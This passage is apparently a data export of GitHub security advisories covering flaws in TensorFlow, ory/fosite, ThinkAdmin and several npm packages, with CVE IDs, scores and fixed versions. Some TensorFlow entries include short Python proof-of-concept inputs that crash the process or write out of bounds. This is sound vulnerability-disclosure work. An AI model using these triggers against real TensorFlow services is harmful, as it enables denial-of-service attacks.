'2021-05-14T20:15:00Z'}" +1.4.0,GHSA-v47f-vp3p-5j6h,2021-04-09T22:17:56Z,2021-05-06T18:53:46Z,,['CVE-2020-29315'],"""Cross-site scripting in ThinkAdmin""","""ThinkAdmin version v6 has a stored XSS vulnerability which allows remote attackers to inject an arbitrary web script or HTML.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'zoujingli/thinkadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29315'}, {'type': 'WEB', 'url': 'https://github.com/zoujingli/ThinkAdmin/issues/255'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T22:17:56Z', 'nvd_published_at': '2020-12-01T17:15:00Z'}" +1.4.0,GHSA-rhwp-9vm9-547q,2022-07-05T17:40:12Z,2021-05-07T16:06:16Z,,['CVE-2021-23377'],Command Injection in onion-oled-js,"This affects all versions up to and including version 0.0.2 of package onion-oled-js. If attacker-controlled user input is given to the scroll function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'onion-oled-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23377'}, {'type': 'PACKAGE', 'url': 'https://github.com/naddeoa/onion-oled-js'}, {'type': 'WEB', 'url': 'https://github.com/naddeoa/onion-oled-js/blob/8a523645d2cc29130f98de661b742893773d760d/src/oled-exp.js#23L91'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ONIONOLEDJS-1078808'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T22:33:55Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-7wpw-2hjm-89gp,2021-05-04T20:20:28Z,2021-05-04T20:18:47Z,,['CVE-2020-28499'],Prototype Pollution in merge,All versions of package merge <2.1.1 are vulnerable to Prototype Pollution via _recursiveMerge .,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28499'}, {'type': 'WEB', 'url': 'https://github.com/yeikos/js.merge/commit/7b0ddc2701d813f2ba289b32d6a4b9d4cc235fb4'}, {'type': 'WEB', 'url': 'https://github.com/yeikos/js.merge/blob/56ca75b2dd0f2820f1e08a49f62f04bbfb8c5f8f/src/index.ts#L64'}, {'type': 'WEB', 'url': 'https://github.com/yeikos/js.merge/blob/master/src/index.ts%23L64'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071049'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MERGE-1042987'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.170146'}]","{'cwe_ids': ['CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:54:25Z', 'nvd_published_at': '2021-02-18T16:15:00Z'}" +1.4.0,GHSA-2cpx-427x-q2c6,2021-05-18T23:20:56Z,2021-05-21T14:21:43Z,,['CVE-2021-29523'],CHECK-fail in AddManySparseToTensorsMap,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.AddManySparseToTensorsMap`: + +```python +import tensorflow as tf +import numpy as np + +sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) +sparse_values = tf.ones([1], dtype=tf.int64) + +shape = tf.Variable(tf.ones([55], dtype=tf.int64)) +shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) + +tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, + sparse_values=sparse_values, + sparse_shape=shape) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/kernels/sparse_tensors_map_ops.cc#L257) takes the values specified in `sparse_shape` as dimensions for the output shape: + +```cc + TensorShape tensor_input_shape(input_shape->vec()); +``` + +The [`TensorShape` constructor](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188) uses a `CHECK` operation which triggers when [`InitDims`](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296) returns a non-OK status. + +```cc +template +TensorShapeBase::TensorShapeBase(gtl::ArraySlice dim_sizes) { + set_tag(REP16); + set_data_type(DT_INVALID); + TF_CHECK_OK(InitDims(dim_sizes)); +} +``` + +In our scenario, this occurs when adding a dimension from the argument results in overflow: + +```cc +template +Status TensorShapeBase::InitDims(gtl::ArraySlice dim_sizes) { + ... + Status status = Status::OK(); + for (int64 s : dim_sizes) { + status.Update(AddDimWithStatus(internal::SubtleMustCopy(s))); + if (!status.ok()) { + return status; + } + } +} + +template +Status TensorShapeBase::AddDimWithStatus(int64 size) { + ... + int64 new_num_elements; + if (kIsPartial && (num_elements() < 0 || size < 0)) { + new_num_elements = -1; + } else { + new_num_elements = MultiplyWithoutOverflow(num_elements(), size); + if (TF_PREDICT_FALSE(new_num_elements < 0)) { + return errors::Internal(""Encountered overflow when multiplying "", + num_elements(), "" with "", size, + "", result: "", new_num_elements); + } + } + ... +} +``` + +This is a legacy implementation of the constructor and operations should use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in the presence of overflows. + +### Patches +We have patched the issue in GitHub commit [69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c](https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2cpx-427x-q2c6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29523'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c'}]","{'cwe_ids': ['CWE-190'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:20:56Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-fmrr-mx6j-h3h5,2021-05-05T18:50:23Z,2021-05-06T18:12:09Z,,['CVE-2020-7714'],Prototype Pollution in confucious,All versions of package confucious up to and including version 0.0.12 are vulnerable to Prototype Pollution via the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'confucious'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7714'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CONFUCIOUS-598665'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:50:23Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-pvrc-hg3f-58r6,2021-05-18T19:22:37Z,2021-05-21T14:25:13Z,,['CVE-2021-29566'],Heap OOB access in `Dilation2DBackpropInput`,"### Impact +An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to `tf.raw_ops.Dilation2DBackpropInput`: + +```python +import tensorflow as tf + +input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) +filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) +out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) + +tf.raw_ops.Dilation2DBackpropInput( + input=input_tensor, filter=filter, out_backprop=out_backprop, + strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID') +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/afd954e65f15aea4d438d0a219136fc4a63a573d/tensorflow/core/kernels/dilation_ops.cc#L321-L322) does not validate before writing to the output array. + +```cc +in_backprop(b, h_in_max, w_in_max, d) += out_backprop(b, h_out, w_out, d); +``` + +The values for `h_out` and `w_out` are guaranteed to be in range for `out_backprop` (as they are loop indices bounded by the size of the array). However, there are no similar guarantees relating `h_in_max`/`w_in_max` and `in_backprop`. + +### Patches +We have patched the issue in GitHub commit [3f6fe4dfef6f57e768260b48166c27d148f3015f](https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pvrc-hg3f-58r6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29566'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f'}]","{'cwe_ids': ['CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:22:37Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-3qxp-qjq7-w4hf,2021-05-18T23:00:53Z,2021-05-21T14:22:13Z,,['CVE-2021-29531'],CHECK-fail in tf.raw_ops.EncodePng,"### Impact +An attacker can trigger a `CHECK` fail in PNG encoding by providing an empty input tensor as the pixel data: + +```python +import tensorflow as tf + +image = tf.zeros([0, 0, 3]) +image = tf.cast(image, dtype=tf.uint8) +tf.raw_ops.EncodePng(image=image) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/kernels/image/encode_png_op.cc#L57-L60) only validates that the total number of pixels in the image does not overflow. Thus, an attacker can send an empty matrix for encoding. However, if the tensor is empty, then the associated buffer is `nullptr`. Hence, when [calling `png::WriteImageToBuffer`](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/kernels/image/encode_png_op.cc#L79-L93), the first argument (i.e., `image.flat().data()`) is `NULL`. This then triggers the `CHECK_NOTNULL` in the [first line of `png::WriteImageToBuffer`](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/lib/png/png_io.cc#L345-L349). + +```cc +template +bool WriteImageToBuffer( + const void* image, int width, int height, int row_bytes, int num_channels, + int channel_bits, int compression, T* png_string, + const std::vector >* metadata) { + CHECK_NOTNULL(image); + ... +} +``` + +Since `image` is null, this results in `abort` being called after printing the stacktrace. Effectively, this allows an attacker to mount a denial of service attack. + +### Patches +We have patched the issue in GitHub commit [26eb323554ffccd173e8a79a8c05c15b685ae4d1](https://github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3qxp-qjq7-w4hf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29531'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1'}]","{'cwe_ids': ['CWE-754'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:00:53Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-rv7p-mmwq-x674,2021-04-20T22:13:23Z,2021-05-10T18:46:58Z,,['CVE-2020-8132'],Improper Input Validation and Code Injection in pdf-image,Lack of input validation in pdf-image npm package version <= 2.0.0 may allow an attacker to run arbitrary code if PDF file path is constructed based on untrusted user input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pdf-image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8132'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/781664'}]","{'cwe_ids': ['CWE-20', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:13:23Z', 'nvd_published_at': '2020-02-28T20:15:00Z'}" +1.4.0,GHSA-gvm4-h8j3-rjrq,2021-05-18T20:18:41Z,2021-05-21T14:24:59Z,,['CVE-2021-29561'],CHECK-fail in `LoadAndRemapMatrix`,"### Impact +An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from `tf.raw_ops.LoadAndRemapMatrix`: + +```python +import tensorflow as tf + +ckpt_path = tf.constant([], shape=[0], dtype=tf.string) +old_tensor_name = tf.constant("""") +row_remapping = tf.constant([], shape=[0], dtype=tf.int64) +col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) +initializing_values = tf.constant(1.0) + +tf.raw_ops.LoadAndRemapMatrix( + ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, + row_remapping=row_remapping, col_remapping=col_remapping, + initializing_values=initializing_values, num_rows=0, num_cols=1) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/d94227d43aa125ad8b54115c03cece54f6a1977b/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L219-L222) assumes that the `ckpt_path` is always a valid scalar. + +```cc +const string& ckpt_path = ckpt_path_t->scalar()(); +``` + +However, an attacker can send any other tensor as the first argument of `LoadAndRemapMatrix`. This would cause the rank `CHECK` in `scalar()()` to trigger and terminate the process. + +### Patches +We have patched the issue in GitHub commit [77dd114513d7796e1e2b8aece214a380af26fbf4](https://github.com/tensorflow/tensorflow/commit/77dd114513d7796e1e2b8aece214a380af26fbf4). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gvm4-h8j3-rjrq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29561'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/77dd114513d7796e1e2b8aece214a380af26fbf4'}]","{'cwe_ids': ['CWE-617'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:18:41Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-grfp-q2mm-hfp6,2021-11-19T14:43:47Z,2021-05-24T17:00:05Z,,['CVE-2020-15234'],Redirect URL matching ignores character casing,"### Impact + +Before version v0.34.1, the OAuth 2.0 Client's registered redirect URLs and the redirect URL provided at the OAuth2 Authorization Endpoint where compared using `strings.ToLower` while they should have been compared with a simple string match: + +1. Registering a client with allowed redirect URL `https://example.com/callback` +2. Performing OAuth2 flow and requesting redirect URL `https://example.com/CALLBACK` +3. Instead of an error (invalid redirect URL), the browser is redirected to `https://example.com/CALLBACK` with a potentially successful OAuth2 response, depending on the state of the overall OAuth2 flow (the user might still deny the request for example).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/fosite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.34.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ory/fosite/security/advisories/GHSA-grfp-q2mm-hfp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15234'}, {'type': 'WEB', 'url': 'https://github.com/ory/fosite/commit/cdee51ebe721bfc8acca0fd0b86b030ca70867bf'}, {'type': 'PACKAGE', 'url': 'https://github.com/ory/fosite'}]","{'cwe_ids': ['CWE-178', 'CWE-20', 'CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:15:37Z', 'nvd_published_at': '2020-10-02T21:15:00Z'}" +1.4.0,GHSA-7mqr-2v3q-v2wm,2023-02-14T00:21:03Z,2021-05-24T16:57:39Z,,['CVE-2020-15223'],Ory fosite contains Improper Handling of Exceptional Conditions ,"### Impact +The `TokenRevocationHandler` ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. + +### References +[RFC 7009](https://tools.ietf.org/html/rfc7009#section-2.2.1) states that a 503 HTTP code must be returned when the server has a problem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/fosite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.34.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ory/fosite/security/advisories/GHSA-7mqr-2v3q-v2wm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15223'}, {'type': 'WEB', 'url': 'https://github.com/ory/fosite/commit/03dd55813f5521985f7dd64277b7ba0cf1441319'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0109'}, {'type': 'WEB', 'url': 'https://tools.ietf.org/html/rfc7009#section-2.2.1'}]","{'cwe_ids': ['CWE-754', 'CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 